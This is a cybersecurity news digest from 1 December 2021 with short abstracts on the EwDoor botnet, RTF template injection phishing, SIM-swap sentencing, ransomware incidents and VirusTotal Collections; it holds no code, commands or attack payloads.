A newly discovered botnet capable of staging distributed denial-of-service (DDoS) attacks targeted unpatched Ribbon Communications (formerly Edgewater Networks) EdgeMarc appliances belonging to telecom service provider AT&T by exploiting a four-year-old flaw in the network appliances. Chinese tech giant Qihoo 360's Netlab network security division, which detected the botnet first on October 27, 2021, called it EwDoor , noting it observed 5,700 compromised IP addresses located in the U.S. during a brief three-hour window. "So far, the EwDoor in our view has undergone three versions of updates, and its main functions can be summarized into two main categories of DDoS attacks and backdoor," the researchers noted . "Based on the attacked devices are telephone communication related, we presume that its main purpose is DDoS attacks, and gathering of sensitive information, such as call logs." Propagating through a flaw in EdgeMarc devices, EwDoor supports aThe Hacker News
December 1, 2021 – Solution
VirusTotal Collections allows enhancing the sharing of Indicators of Compromise (IoCs) Full Text
Abstract
VirusTotal announced VirusTotal Collections, a new service that allows security researchers to share sets of Indicators of Compromise (IoCs). VirusTotal announced VirusTotal Collections, a new service that allows threat researchers to share Indicators...Security Affairs
December 01, 2021 – Policy and Law
Former Ubiquiti dev charged for trying to extort his employer Full Text
Abstract
Nickolas Sharp, a former employee of networking device maker Ubiquiti, was arrested and charged today with data theft and attempting to extort his employer while posing as a whistleblower and an anonymous hacker.BleepingComputer
December 1, 2021 – Solution
VirusTotal Introduces ‘Collections’ to Simplify IoC Sharing Full Text
Abstract
Chronicle-owned VirusTotal this week announced VirusTotal Collections, a new resource aimed at making it easier for security researchers to share Indicators of Compromise (IoCs).Security Week
December 01, 2021 – Government
House passes bipartisan bills to strengthen networks security, cyber literacy Full Text
Abstract
The House on Wednesday passed three bipartisan bills intended to shore up network security and increase cyber literacy across the nation, following a difficult year fraught with several significant cybersecurity attacks.The Hill
December 01, 2021 – Hacker
Hackers Increasingly Using RTF Template Injection Technique in Phishing Attacks Full Text
Abstract
Three different state-sponsored threat actors aligned with China, India, and Russia have been observed adopting a new method called RTF (aka Rich Text Format) template injection as part of their phishing campaigns to deliver malware to targeted systems. "RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file," Proofpoint researchers said in a new report shared with The Hacker News. At the heart of the attack is an RTF file containing decoy content that can be manipulated to enable the retrieval of content, including malicious payloads, hosted at an external URL upon opening an RTF file. Specifically, it leverages the RTF template functionality to alter a document's formatting properties using a hex editor by specifying a URL resource instead of an accessible file resource destination from which a remote payloadThe Hacker News
December 1, 2021 – APT
New RTF Template Inject technique used by APT groups in recent attacks Full Text
Abstract
Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks. APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent...Security Affairs
December 01, 2021 – Criminals
Bulletproof hosting founder imprisoned for helping cybercrime gangs Full Text
Abstract
34-year-old Russian Aleksandr Grichishkin, the founder of a bulletproof hosting service, was sentenced to 60 months in prison for allowing cybercrime gangs to use the platform in attacks targeting US financial institutions between 2008 to 2015.BleepingComputer
December 1, 2021 – Vulnerabilities
‘Over-permissive’ authentication checks left 190 Australian organizations vulnerable to business email compromise attacks Full Text
Abstract
Email authentication checks could be hoodwinked by phishing emails impersonating nearly 200 Australian organizations due to a vulnerability discovered more than two years after its conception.The Daily Swig
December 01, 2021 – Disinformation
Facebook, Instagram remove accounts linked to Chinese COVID-19 disinformation efforts Full Text
Abstract
Meta on Wednesday announced that it had removed hundreds of accounts, pages and groups linked to a Chinese effort to spread disinformation around the United States pressuring the World Health Organization (WHO) to blame the COVID-19 pandemic on China.The Hill
December 01, 2021 – Cryptocurrency
Hacker Jailed for Stealing Millions of Dollars in Cryptocurrencies by SIM Hijacking Full Text
Abstract
A sixth member associated with an international hacking group known as The Community has been sentenced in connection with a multimillion-dollar SIM swapping conspiracy, the U.S. Department of Justice (DoJ) said. Garrett Endicott, 22, from the U.S. state of Missouri, who pleaded guilty to charges of wire fraud and aggravated identity theft following an indictment in 2019, was sentenced to 10 months in prison and ordered to pay an amount totaling $121,549.37 in restitution. SIM swapping , also called SIM hijacking, refers to an identity theft scheme wherein malicious parties persuade phone carriers into porting their victims' cell services to SIM cards under their control, often facilitated by bribing an employee of a mobile phone provider or by contacting the service provider's customer support by posing as the victim and requesting that the phone number be swapped to a SIM card operated by the group. The goal is to leverage the phone numbers as a gateway to hijack difThe Hacker News
December 1, 2021 – Privacy
FBI training document shows lawful access to multiple encrypted messaging apps Full Text
Abstract
Which are the most secure encrypted messaging apps? An FBI document shows what data can be obtained from them. The Record shared an FBI training document that reveals the surveillance capabilities of the US law enforcement detailing which data can be extracted...Security Affairs
December 01, 2021 – Malware
Malicious Android app steals Malaysian bank credentials, MFA codes Full Text
Abstract
A fake Android app is masquerading as a housekeeping service to steal online banking credentials from the customers of eight Malaysian banks.BleepingComputer
December 1, 2021 – Criminals
European Money Mule Action leads to 1,803 arrests Full Text
Abstract
This was the seventh iteration of the European Money Mule Action, or ‘EMMA’, which was established in 2016 on the initiative of Europol, Eurojust, and the European Banking Federation.Europol
December 01, 2021 – Government
CISA announces members of team providing advice on cybersecurity threats Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday announced the establishment of its Cybersecurity Advisory Committee and the nearly two dozen members who will provide input on efforts to enhance cybersecurity defense priorities.The Hill
December 1, 2021 – Ransomware
Sabbath Ransomware target critical infrastructure in the US and Canada Full Text
Abstract
Sabbath ransomware is a new threat that has been targeting critical infrastructure in the United States and Canada since June 2021. A new ransomware group called Sabbath (aka UNC2190) has been targeting critical infrastructure in the United States...Security Affairs
December 01, 2021 – Vulnerabilities
Mozilla fixes critical bug in cross-platform cryptography library Full Text
Abstract
Mozilla has addressed a critical memory corruption vulnerability affecting its cross-platform Network Security Services (NSS) set of cryptography libraries.BleepingComputer
December 1, 2021 – Vulnerabilities
Use-after-free condition in Google Chrome could lead to code execution Full Text
Abstract
The use-after-free vulnerability in Chrome is triggered by opening a specially crafted webpage which could trigger the reuse of previously freed memory, which can lead to arbitrary code execution.Cisco Talos
December 01, 2021 – Hacker
Hackers targeting and stealing billions from Iranian citizens in texting scheme Full Text
Abstract
Financially motivated hackers likely based in Iran are successfully targeting and stealing billions in currency from Iranian civilians through a texting campaign, new research released Wednesday found.The Hill
December 01, 2021 – Ransomware
Microsoft Exchange servers hacked to deploy BlackByte ransomware Full Text
Abstract
BlackByte ransomware actors were observed exploiting the ProxyShell set of vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to compromise Microsoft Exchange servers.BleepingComputer
December 1, 2021 – Education
Understanding the Adversary: How Ransomware Attacks Happen Full Text
Abstract
The most common access vectors for ransomware attacks continue to be phishing, vulnerability exploitation including Exploitation of a Public-Facing Application, and External Remote Services.Security Intelligence
December 01, 2021 – Solution
VirusTotal Collections feature helps keep neat IoC lists Full Text
Abstract
Scanning service VirusTotal announced today a new feature called Collections that lets researchers create and share reports with indicators of compromise observed in security incidents.BleepingComputer
December 1, 2021 – Criminals
Ottawa’s French public school board paid hackers a ransom following cyberattack Full Text
Abstract
Hackers had stolen approximately 75 GB worth of data about employees and some students and parents dating back to 2000 that was stored on a server at the board's main office.CTV News
December 01, 2021 – Phishing
State-backed hackers increasingly use RTF injection for phishing Full Text
Abstract
Three APT hacking groups from India, Russia, and China, were observed using a novel RTF (rich text format) template injection technique in their recent phishing campaigns.BleepingComputer
December 1, 2021 – Government
CISA Seeks Protective Email Service that Tracks Agencies’ Security Compliance Full Text
Abstract
The CISA is in the market for a service that can help to protect both recipients of government emails as well as agencies themselves by ensuring email platforms are securely configured.Nextgov